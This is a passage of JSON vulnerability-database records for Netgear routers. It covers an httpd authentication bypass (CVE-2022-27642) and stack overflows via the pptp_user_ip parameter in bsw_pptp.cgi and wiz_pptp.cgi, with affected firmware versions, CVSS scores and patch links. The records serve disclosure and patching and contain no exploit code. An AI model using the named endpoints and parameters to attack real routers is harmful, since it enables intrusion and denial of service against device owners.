"vendor": "netgear",
"version": "1.3.3.148"
},
{
"model": "rax38",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.11.134"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.3.88"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.148"
},
{
"model": "rax43",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "cax80",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2.1.3.7"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.84"
},
{
"model": "rax50",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "rax15",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "rax200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.6.138"
},
{
"model": "rax35",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "rax45",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.10.110"
},
{
"model": "r7960p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ms80",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "mr80",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "lax20",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7850",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6700",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6400",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "mr60",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6900p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7000p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "rax20",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "cax80",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ms60",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7900p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "rax15",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8000p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6700v3",
"scope": null,
"trust": 0.7,
"vendor": "netgear",
"version": null
},
{
"model": "r6700v3 1.0.4.120 10.0.91",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-518"
},
{
"db": "CNVD",
"id": "CNVD-2025-17536"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-021793"
},
{
"db": "NVD",
"id": "CVE-2022-27642"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Bugscale team",
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-518"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2054"
}
],
"trust": 1.3
},
"cve": "CVE-2022-27642",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2025-17536",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2022-27642",
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2022-27642",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2022-27642",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2022-27642",
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2022-27642",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2022-27642",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2022-27642",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2022-27642",
"trust": 0.7,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2025-17536",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202203-2054",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-518"
},
{
"db": "CNVD",
"id": "CNVD-2025-17536"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-021793"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2054"
},
{
"db": "NVD",
"id": "CVE-2022-27642"
},
{
"db": "NVD",
"id": "CVE-2022-27642"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6700v3 1.0.4.120_10.0.91 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the httpd service. The issue results from incorrect string matching logic when accessing protected pages. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of root. Was ZDI-CAN-15854. cax80 firmware, LAX20 firmware, MR60 Multiple Netgear products, including firmware, contain vulnerabilities related to unauthorized authentication.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The NETGEAR R6700v3 is the Nighthawk AC1750 Smart Dual-Band Gigabit Router from NETGEAR",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-27642"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-021793"
},
{
"db": "ZDI",
"id": "ZDI-22-518"
},
{
"db": "CNVD",
"id": "CNVD-2025-17536"
},
{
"db": "VULMON",
"id": "CVE-2022-27642"
}
],
"trust": 2.88
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-27642",
"trust": 4.6
},
{
"db": "ZDI",
"id": "ZDI-22-518",
"trust": 3.8
},
{
"db": "JVNDB",
"id": "JVNDB-2022-021793",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-15854",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2025-17536",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022032410",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2054",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2022-27642",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-518"
},
{
"db": "CNVD",
"id": "CNVD-2025-17536"
},
{
"db": "VULMON",
"id": "CVE-2022-27642"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-021793"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2054"
},
{
"db": "NVD",
"id": "CVE-2022-27642"
}
]
},
"id": "VAR-202203-1668",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-17536"
}
],
"trust": 0.9457551631578947
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-17536"
}
]
},
"last_update_date": "2025-08-06T22:55:28.048000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "NETGEAR has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://kb.netgear.com/000064723/Security-Advisory-for-Multiple-Vulnerabilities-on-Multiple-Products-PSV-2021-0327"
},
{
"title": "Patch for NETGEAR R6700v3 Information Disclosure Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/713036"
},
{
"title": "NETGEAR R6700v3 Repair measures for information disclosure vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=232028"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-518"
},
{
"db": "CNVD",
"id": "CNVD-2025-17536"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2054"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-863",
"trust": 1.0
},
{
"problemtype": "Illegal authentication (CWE-863) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-021793"
},
{
"db": "NVD",
"id": "CVE-2022-27642"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.8,
"url": "https://www.zerodayinitiative.com/advisories/zdi-22-518/"
},
{
"trust": 3.2,
"url": "https://kb.netgear.com/000064723/security-advisory-for-multiple-vulnerabilities-on-multiple-products-psv-2021-0327"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27642"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-27642/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022032410"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/863.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-518"
},
{
"db": "CNVD",
"id": "CNVD-2025-17536"
},
{
"db": "VULMON",
"id": "CVE-2022-27642"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-021793"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2054"
},
{
"db": "NVD",
"id": "CVE-2022-27642"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-22-518"
},
{
"db": "CNVD",
"id": "CNVD-2025-17536"
},
{
"db": "VULMON",
"id": "CVE-2022-27642"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-021793"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2054"
},
{
"db": "NVD",
"id": "CVE-2022-27642"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-03-23T00:00:00",
"db": "ZDI",
"id": "ZDI-22-518"
},
{
"date": "2025-07-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-17536"
},
{
"date": "2023-03-29T00:00:00",
"db": "VULMON",
"id": "CVE-2022-27642"
},
{
"date": "2023-11-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-021793"
},
{
"date": "2022-03-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-2054"
},
{
"date": "2023-03-29T19:15:08.407000",
"db": "NVD",
"id": "CVE-2022-27642"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-03-23T00:00:00",
"db": "ZDI",
"id": "ZDI-22-518"
},
{
"date": "2025-08-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-17536"
},
{
"date": "2023-03-30T00:00:00",
"db": "VULMON",
"id": "CVE-2022-27642"
},
{
"date": "2023-11-14T04:15:00",
"db": "JVNDB",
"id": "JVNDB-2022-021793"
},
{
"date": "2023-04-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-2054"
},
{
"date": "2023-04-05T14:53:25.610000",
"db": "NVD",
"id": "CVE-2022-27642"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-2054"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "NETGEAR R6700v3 Information Disclosure Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-17536"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2054"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-2054"
}
],
"trust": 0.6
}
}
VAR-202411-2743
Vulnerability from variot - Updated: 2025-05-27 23:42Netgear R8500 v1.0.2.160, XR300 v1.0.3.78, R7000P v1.3.3.154, and R6400 v2 1.0.4.128 were discovered to contain a stack overflow via the pptp_user_ip parameter at bsw_pptp.cgi. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. R8500 firmware, XR300 firmware, R7000P A classic buffer overflow vulnerability exists in multiple Netgear products, including firmware.Service operation interruption (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202411-2743",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.160"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.154"
},
{
"model": "r6400v2",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.128"
},
{
"model": "xr300",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.78"
},
{
"model": "r7000p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6400v2",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "xr300",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024155"
},
{
"db": "NVD",
"id": "CVE-2024-52015"
}
]
},
"cve": "CVE-2024-52015",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 5.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.1,
"id": "CVE-2024-52015",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 5.7,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2024-024155",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2024-52015",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "OTHER",
"id": "JVNDB-2024-024155",
"trust": 0.8,
"value": "Medium"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024155"
},
{
"db": "NVD",
"id": "CVE-2024-52015"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear R8500 v1.0.2.160, XR300 v1.0.3.78, R7000P v1.3.3.154, and R6400 v2 1.0.4.128 were discovered to contain a stack overflow via the pptp_user_ip parameter at bsw_pptp.cgi. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. R8500 firmware, XR300 firmware, R7000P A classic buffer overflow vulnerability exists in multiple Netgear products, including firmware.Service operation interruption (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-52015"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-024155"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-52015",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2024-024155",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024155"
},
{
"db": "NVD",
"id": "CVE-2024-52015"
}
]
},
"id": "VAR-202411-2743",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.47773457333333336
},
"last_update_date": "2025-05-27T23:42:23.968000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024155"
},
{
"db": "NVD",
"id": "CVE-2024-52015"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.netgear.com/about/security/"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/netgear4/vuln_43/43.md"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-52015"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024155"
},
{
"db": "NVD",
"id": "CVE-2024-52015"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024155"
},
{
"db": "NVD",
"id": "CVE-2024-52015"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-05-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-024155"
},
{
"date": "2024-11-05T15:15:26.520000",
"db": "NVD",
"id": "CVE-2024-52015"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-05-23T02:52:00",
"db": "JVNDB",
"id": "JVNDB-2024-024155"
},
{
"date": "2025-05-21T20:24:01.020000",
"db": "NVD",
"id": "CVE-2024-52015"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Classic buffer overflow vulnerability in multiple Netgear products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024155"
}
],
"trust": 0.8
}
}
VAR-202411-2192
Vulnerability from variot - Updated: 2025-05-27 23:38Netgear R8500 v1.0.2.160, XR300 v1.0.3.78, R7000P v1.3.3.154, and R6400 v2 1.0.4.128 were discovered to contain a stack overflow via the pptp_user_ip parameter at wiz_pptp.cgi. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. R8500 firmware, XR300 firmware, R7000P A classic buffer overflow vulnerability exists in multiple Netgear products, including firmware.Service operation interruption (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
